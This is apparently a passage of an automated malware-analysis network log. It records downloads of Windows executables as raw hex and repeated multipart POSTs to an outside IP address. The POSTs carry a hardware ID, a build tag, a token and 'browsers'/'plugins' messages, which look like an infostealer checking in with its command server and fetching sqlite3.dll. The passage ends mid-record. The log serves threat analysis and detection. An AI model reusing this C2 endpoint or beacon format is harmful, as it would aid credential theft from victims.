00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 07:37:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 07:37:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 07:37:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 07:37:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Dec 2024 07:37:11 GMTContent-Type: application/octet-streamContent-Length: 3229184Last-Modified: Tue, 24 Dec 2024 06:41:37 GMTConnection: keep-aliveETag: "676a57a1-314600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 50 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 31 00 00 04 00 00 e6 f2 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 37 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 36 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d4 05 00 00 00 90 06 00 00 06 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 67 78 73 6e 6f 72 66 72 00 90 2a 00 00 b0 06 00 00 88 2a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 74 6f 66 6d 64 66 79 00 10 00 00 00 40 31 00 00 04 00 00 00 20 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 31 00 00 22 00 00 00 24 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKKJJKJEGIECAKJJEBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 34 32 42 33 45 41 34 33 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 2d 2d 0d 0a Data Ascii: ------KKJKKJJKJEGIECAKJJEBContent-Disposition: form-data; name="hwid"D242B3EA43BD3120641781------KKJKKJJKJEGIECAKJJEBContent-Disposition: form-data; name="build"stok------KKJKKJJKJEGIECAKJJEB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 34 61 39 33 62 64 34 38 61 65 61 65 39 37 38 32 38 36 34 36 65 64 63 63 62 31 36 37 62 36 31 65 37 64 34 33 61 66 34 34 30 36 61 66 39 37 34 38 65 38 62 30 62 64 66 36 32 33 64 33 35 66 35 32 61 38 36 34 37 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"cf4a93bd48aeae97828646edccb167b61e7d43af4406af9748e8b0bdf623d35f52a86479------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="message"browsers------HIDAKFIJJKJJJKEBKJEH--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFBGDGHIIJJKEBKJDBHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 42 47 44 47 48 49 49 4a 4a 4b 45 42 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 34 61 39 33 62 64 34 38 61 65 61 65 39 37 38 32 38 36 34 36 65 64 63 63 62 31 36 37 62 36 31 65 37 64 34 33 61 66 34 34 30 36 61 66 39 37 34 38 65 38 62 30 62 64 66 36 32 33 64 33 35 66 35 32 61 38 36 34 37 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 42 47 44 47 48 49 49 4a 4a 4b 45 42 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 42 47 44 47 48 49 49 4a 4a 4b 45 42 4b 4a 44 42 2d 2d 0d 0a Data Ascii: ------KEBFBGDGHIIJJKEBKJDBContent-Disposition: form-data; name="token"cf4a93bd48aeae97828646edccb167b61e7d43af4406af9748e8b0bdf623d35f52a86479------KEBFBGDGHIIJJKEBKJDBContent-Disposition: form-data; name="message"plugins------KEBFBGDGHIIJJKEBKJDB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 34 61 39 33 62 64 34 38 61 65 61 65 39 37 38 32 38 36 34 36 65 64 63 63 62 31 36 37 62 36 31 65 37 64 34 33 61 66 34 34 30 36 61 66 39 37 34 38 65 38 62 30 62 64 66 36 32 33 64 33 35 66 35 32 61 38 36 34 37 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 2d 2d 0d 0a Data Ascii: ------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="token"cf4a93bd48aeae97828646edccb167b61e7d43af4406af9748e8b0bdf623d35f52a86479------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="message"fplugins------DBAAFIDGDAAAAAAAAKEB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJEHost: 185.215.113.206Content-Length: 6331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEBKJJDGHCBGCAAKEHDHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 34 61 39 33 62 64 34 38 61 65 61 65 39 37 38 32 38 36 34 36 65 64 63 63 62 31 36 37 62 36 31 65 37 64 34 33 61 66 34 34 30 36 61 66 39 37 34 38 65 38 62 30 62 64 66 36 32 33 64 33 35 66 35 32 61 38 36 34 37 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 